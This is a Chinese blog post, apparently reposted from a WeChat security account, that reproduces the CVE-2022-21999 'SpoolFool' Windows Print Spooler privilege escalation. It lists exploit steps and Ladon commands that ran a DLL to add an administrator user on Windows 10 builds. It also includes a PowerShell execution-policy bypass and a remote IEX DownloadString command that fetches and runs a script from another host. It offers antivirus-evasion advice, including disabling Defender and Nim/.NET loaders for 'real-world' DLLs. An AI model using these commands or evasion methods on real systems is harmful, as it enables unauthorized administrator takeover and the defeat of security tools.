程序简介
Windows Print Spooler 是所有 Windows 工作站和服务器上的内置组件,它是打印界面的主要组件。Print Spooler 是管理打印过程的可执行文件。打印管理包括检索正确打印机驱动程序的位置、加载该驱动程序、将高级函数调用假脱机到打印作业、调度打印作业以进行打印,等等。后台处理程序在系统启动时加载并继续运行,直到操作系统关闭。打印机程序无论是个人机还是服务器都是默认启动,这是Windows最傻吊的地方,该默认启动的一些服务器功能,它竟然不启用,启用打印机服务...
spoolsv.exe
spoolsv.exe是 Spooler 的 API 服务器。它被实现为操作系统启动时启动的服务。此模块将 RPC 接口导出到 Spooler 的 Win32 API 的服务器端。spoolsv.exe包括winspool.drv(本地)和win32spl.dll(远程)的客户。该模块实现了一些 API 函数,但大多数函数调用通过路由器 ( spoolss.dll) 传递给打印提供者。
漏洞编号
CVE-2022-21999
PS:该漏洞系Printnightmare的续集,包括 CVE-2020–1030 的两次绕过,漏洞利用的步骤如下
创建一个临时基目录,用于我们的假脱机目录,稍后我们将把它变成一个重解析点创建名为“Microsoft XPS Document Writer v4”的新本地打印机将新打印机的假脱机目录设置为我们的临时基础目录在我们的临时基目录上创建一个重解析点以指向打印机驱动程序目录AppVTerminator.dll通过加载到 Spooler中强制 Spooler 重新启动以创建目录将 DLL 写入打印机驱动程序目录内的新目录将 DLL 加载到 Spooler
影响版本
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21999
发行版:2022/02/08
Ladon提权
Ladon CVE-2022-21999 *.dllLadon SpoolFool *.dll
PS: Ladon 模块名称,一般都会返回模块用法,提权模块会返回影响版本
Win10 20H2 成功执行DLL,添加管理员用户
Win10 1803 成功执行DLL,添加管理员用户
其它系统或版本自行测试,测试的DLL可使用LadonGUI生成,默认Defender杀DLL,测试可先关闭,Ladon可使用net2nim免杀,实战用的DLL自行编译。
DLL生成功能参考: http://k8gege.org/Ladon/cmddll.html
PowerShell
exe被杀,除了用Nim内存加载外,也可以使用PowerShell版加载,是否可用具体看杀软版本,NimLadon需大家自行转换。
本地加载
powershell -exec bypass Import-Module .Ladon.ps1;Ladon CVE-2022-21999 sc64.dll远程加载
若ps1被杀,也可以Ladon web 800启用迷你web,通过远程加载Ladon提权,
参考:http://k8gege.org/Ladon/win2016_lpe_potato_bypass.html
powershell -nop -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.8/Ladon.ps1'); Ladon CVE-2022-21999 sc64.dll"参考
[原创].net程序免杀Win10 20H2 Defender
https://github.com/ly4k/SpoolFool 原版DLL源码
[提权]cve-2022-21882CVE-2021-1732CVE-2021-34486CVE-2021-40449
原文始发于微信公众号(K8实验室):【提权】CVE-2022-21999 SpoolFool打印机提权漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论